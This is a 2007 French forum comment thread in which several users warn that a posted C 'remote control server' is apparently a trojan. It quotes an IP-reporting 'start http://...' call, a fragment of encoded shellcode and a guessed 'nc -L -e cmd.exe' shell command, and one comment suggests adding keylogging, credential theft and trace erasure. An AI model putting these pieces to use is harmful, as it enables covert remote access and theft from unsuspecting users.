UN SERVEUR,POUR CONTOLLER EFFICACEMENT UN ORDINATEUR À DISTANCE

cs_aardman Messages postés 1905 Date d'inscription mercredi 22 janvier 2003 Statut Membre Dernière intervention 17 septembre 2012 - 16 juil. 2007 à 21:33
cs_max12 Messages postés 1491 Date d'inscription dimanche 19 novembre 2000 Statut Modérateur Dernière intervention 7 juillet 2014 - 27 juil. 2007 à 22:15
Cette discussion concerne un article du site. Pour la consulter dans son contexte d'origine, cliquez sur le lien ci-dessous.

https://codes-sources.commentcamarche.net/source/43479-un-serveur-pour-contoller-efficacement-un-ordinateur-a-distance

cs_max12 Messages postés 1491 Date d'inscription dimanche 19 novembre 2000 Statut Modérateur Dernière intervention 7 juillet 2014
27 juil. 2007 à 22:15
Souvent c'est windows.h, winsock2.h qui manque car SOCKET étant un typedef Windows only (nux = int)
thedarkosa Messages postés 1 Date d'inscription dimanche 7 janvier 2007 Statut Membre Dernière intervention 27 juillet 2007
27 juil. 2007 à 21:54
J'aimerais savoir quand cela ce fait t'il que sous DEV j'ai une erreur de compilation qui me dit que à la ligne 33 " `SOCKET' was not declared in this scope "
J'aimerais savoir comment eliminer ce bug si quelqu'un sait
Merci d'avance
LeFauve42 Messages postés 239 Date d'inscription vendredi 20 octobre 2006 Statut Membre Dernière intervention 20 avril 2009
24 juil. 2007 à 09:42
>Crois-moi, un programme bien écrit et bien structuré est un programme où tu as éliminé 70%
>de bugs immédiat et 20% de bug de fonctionnement en moins d'une heure (les 10% restants ...
> hummm... spécification d'utilisation :D )

Je crois que le but ici n'est pas de fournir un exemple de programmation, mais plutot de tenter les "wannabe hackers" et de detourner leur PC. Moins le code est clair, plus il est facile de passer a cote des bouts de codes malicieux... (98 lignes pour une fonction qui renome un fichier... faut pas deconner, meme en assembleur on doit pouvoir faire plus court :o) ).

Je soupconnais que le "start" servait a recuperer l'adresse IP, mais je n'avais pas tilte sur le nom du script php... LOL. Maintenant, je n'ai plus beaucoup de doute non plus...

Je serais quand meme curieux de savoir ce que fait la partie assemblee en dur... Je pencherais pour un truc genre "nc -L -e cmd.exe" mais ce n'est qu'une intuition...

Eric
mickbad Messages postés 71 Date d'inscription mercredi 17 juillet 2002 Statut Membre Dernière intervention 20 avril 2008
24 juil. 2007 à 09:28
Bonjour,

Personnellement et au delà du sujet, je trouve que le code n'est pas vraiment bien écrit. Excuse moi de dire ça mpo007 mais quand on veut faire profiter l'humanité d'un code (pour reprendre l'expression d'un de mes illustres posteurs qui m'ont précédé ;)) on essaye d'arranger le code pour que ça soit joli à regarder et fonctionnel. Quand on code il faut justement penser aux autres personnes susceptibles de le lire (et bonjour la maintenance ensuite, non ?)

Franchement, faire une api pour le travail de socket est mieux car tu pourrais réutiliser ce code comme une couche indépendante. etc etc etc ...

Arf de toute façon, je trouve aussi le code un peu malsain avec ce genre d'instruction
system("start http://max.wal.ifrance.com/ip2.php"); /// HAHAHA ip2.php ... mdr

d'ailleurs utilise les apis win32 pour faire ça au lieu d'utiliser de faire confiance au système d'exploitation surtout que le start t'ouvre une fenêtre.

Maintenant je te dis ça en toute amitié et j'espère que cela va te servir de base pour une meilleure programmation. Crois-moi, un programme bien écrit et bien structuré est un programme où tu as éliminé 70% de bugs immédiat et 20% de bug de fonctionnement en moins d'une heure (les 10% restants ... hummm... spécification d'utilisation :D )

Dernière chose : je ne recommande pas non plus l'utilisation de ce code sans modifications préalables

bonne continuation ...
Mick
Cr30s Messages postés 12 Date d'inscription jeudi 6 avril 2006 Statut Membre Dernière intervention 3 juin 2008
23 juil. 2007 à 18:13
MessageBox(NULL, "hi c'est max007 ;)", "hacked != cracher == NULL", MB_OK);

C'est quand même osé cette ligne : mouahahah

Et s'il te plaît fait un effort sur la rédaction, il y a de la faute de frappe à tout bout de champ .
De plus je suis tout à fait d'accord avec Eric, c'est carrément du social engineering mais de mauvais
goût : surtout quand on voit les bouts de commentaires avec "victime" .

Je crois que la var "janbar" va devenir mythique ... :D . En tout cas j'ai rigolé 5 bonnes minutes, merci .
LeFauve42 Messages postés 239 Date d'inscription vendredi 20 octobre 2006 Statut Membre Dernière intervention 20 avril 2009
23 juil. 2007 à 10:50
Salut,

A propos de Trojan, est-ce que quelqu'un a essaye de desassembler la fonction encodee dans la variable janbar ?
unsigned char janbar[500]=
"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74...

J'avoue que ca ne donne pas super confiance... Le titre aguicheur du post, les bouts de code client serveur basiques que tout le monde connait, et le fait que le topic soit destine aux debutants...
Je me trompe peut-etre, mais ca sent vraiment le trojan :o)
Sans parler de la connection au site automatiquement au demarrage (ou comment envoyer votre adresse IP a l'auteur d'un code "non facilement decriptable" qui entre autre ouvre un port sur votre PC).

Pour revenir au cote educatif de ce source, c'est une variante interessante de ce qu'on appelle le "social engineering" ou comment faire faire a votre victime ce que vous ne pouvez pas faire a sa place (dans ce cas, installer un serveur permettant un controle "efficace" de votre ordinateur.

Sinon, je dirais qu'il y a des tas de framework client/serveurs un peu mieux ecrits (mais peut-etre que le fait que ce ne soit pas trop facile a relire est voulu).

De plus, pourquoi inclure nc, alors que le telnet standard de Windows devrait fonctionner aussi ? (enfin, peut-etre qu'avoir nc sur le pc en local permet de creer de nouvelles failles de securite (n'oubliez pas que netcat marche dans les deux sens et peu entre autre lancer une commande redirigee vers un port IP)).

Bref, mon conseil: N'essayez pas ce programme si vous ne comprenez pas ce qu'il fait (surtout la commande max007_get_you_cmd() au nom si evocateur...), et commentez au moins la ligne qui envoie votre adresse IP chez Max (si vous ne pouvez identifier cette ligne par vous meme, un conseil, laissez tomber :o) ).

Eric
cs_omnia Messages postés 240 Date d'inscription jeudi 9 janvier 2003 Statut Membre Dernière intervention 22 mars 2009
17 juil. 2007 à 22:44
Salut, ton code est assez basique en fait, rien d'exeptionnel, il y a déja, une multitude de clients /serveurs qui trainent sur le site...

Pour ta petite touche hacker, franchement lol <no comment>

sinon il serait intéressant d'ajouter à ton serveur un moyen de lire le registre, récupérer les authentifiant actuels, keylogger, de masquer sa présence, effacer ses traces, etc.. si tu veux te rapprocher beaucoup plus d'un trojen?

sinon "trojane" en trojan, c'est quand même mieux (juste comme ca, moi et l'orthographe =-5000 ):p

http://www.dicodunet.com/definitions/internet/cheval-de-troie.htm

bonne continuation.
cs_aardman Messages postés 1905 Date d'inscription mercredi 22 janvier 2003 Statut Membre Dernière intervention 17 septembre 2012 3
17 juil. 2007 à 20:46
Je te critiquais pas personnelement, c'est juste ton explication finale qui est marrante, car elle contredis completement le code que tu postes.
C'est un truc qu'on vois de temp en temp ici, quelqu'un poste une source pour la science, pour aider l'humanité, et non pas pour faire du mal aux gens. Apres quand regarde le code source, tu trouves plein de commentaires comme infecter un pc, supprimer les fichiers de la victime, etc.
Logique quoi :)
mpo007 Messages postés 12 Date d'inscription jeudi 6 juillet 2006 Statut Membre Dernière intervention 7 mars 2009
17 juil. 2007 à 15:27
c'est vrai max12 que on apprend beaucoup de choses dans la programmation system.dans ce programme par exemple.mais je tiens à ce que je te dise que trojane ça n'existe pas dans la programmation system on parle plutôt de client/serveur ou de socket.mais trojane ça se dit souvent par des lamers ou crachers ceux qui veulent causer du mal aux autres.et une derniere chose à "AARDMAN" essaye de commprendre ma source plutôt que de crétiquer les gens comme ça,j'ai mit cette source pour aider les gens et pour que les gens m'aident.on s'entre-aide ici mais on critique pas les gens comme ça.
cs_max12 Messages postés 1491 Date d'inscription dimanche 19 novembre 2000 Statut Modérateur Dernière intervention 7 juillet 2014
17 juil. 2007 à 02:11
Bah ose dire en toute honnêteté que coder un trojan c'est pas super-instructif ;p (On touche a plein de chose dans un même programme)
cs_aardman Messages postés 1905 Date d'inscription mercredi 22 janvier 2003 Statut Membre Dernière intervention 17 septembre 2012 3
16 juil. 2007 à 21:33
j'aime bien le passage sur le hacking c'est bien on fait ca pour la connaissance etc
c'est toujours marrant de lire ce genre de chose...
Rejoignez-nous